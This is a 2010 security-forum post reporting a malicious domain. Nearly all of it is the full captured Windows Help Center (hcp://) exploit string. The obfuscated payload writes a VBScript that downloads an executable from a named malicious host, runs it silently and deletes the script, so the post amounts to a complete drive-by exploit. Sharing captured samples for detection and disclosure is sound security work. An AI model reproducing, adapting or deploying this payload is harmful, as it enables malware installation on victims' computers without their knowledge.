Author Topic: Malicious domain using Windows HCP Exploit  (Read 6765 times)

0 Members and 1 Guest are viewing this topic.

September 30, 2010, 09:20:51 pm
Read 6765 times

jepearsall

  • Newbie

  • Offline
  • *

  • 1
Found this one on msnbc.com - http://predisruption.com/sell/exe.php-exp
detected as Mal/Psyme-A by Ironport

full HCP script:
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>Run('cmd /c echo FileName ! @}TEMP}/file.exe@>>}TEMP}/go.vbs]]echo url!@http://predisruption.com/sell/exe.php-exp!HCP]key!78872c960b0135f567e2b3c1c7c3bc55@ >>}TEMP}/go.vbs]]echo Set objHTTP ! CreateObject(@MSXML2.XMLHTTP@)>>}TEMP}/go.vbs]]echo Call objHTTP.Open(@GET@, url, False)>>}TEMP}/go.vbs]]echo objHTTP.Send>>}TEMP}/go.vbs]]echo set oStream ! createobject(@Adodb.Stream@)>>}TEMP}/go.vbs]]echo Const adTypeBinary ! 1 >>}TEMP}/go.vbs]]echo Const adSaveCreateOverWrite ! 2 >>}TEMP}/go.vbs]]echo Const adSaveCreateNotExist ! 1  >>}TEMP}/go.vbs]]echo oStream.type ! adTypeBinary>>}TEMP}/go.vbs]]echo oStream.open>>}TEMP}/go.vbs]]echo oStream.write objHTTP.responseBody>>}TEMP}/go.vbs]]echo oStream.savetofile FileName, adSaveCreateNotExist>>}TEMP}/go.vbs]]echo oStream.close>>}TEMP}/go.vbs]]echo set oStream ! nothing>>}TEMP}/go.vbs]]echo Set xml ! Nothing>>}TEMP}/go.vbs]]echo Set WshShell ! CreateObject(@WScript.Shell@)>>}TEMP}/go.vbs]]echo WshShell.Run FileName, 0, True>>}TEMP}/go.vbs]]echo Set FSO ! CreateObject(@Scripting.FileSystemObject@)>>}TEMP}/go.vbs]]echo FSO.DeleteFile @}TEMP}/go.vbs@ >>}TEMP}/go.vbs|cscript }TEMP}/go.vbs>nul'.replace(/!/g, String.fromCharCode(61)).replace(/@/g, String.fromCharCode(34)).replace(/]/g, String.fromCharCode(38)).replace(/{/g, String.fromCharCode(63)).replace(/}/g, String.fromCharCode(37)).replace(/-/g, String.fromCharCode(63)));</script>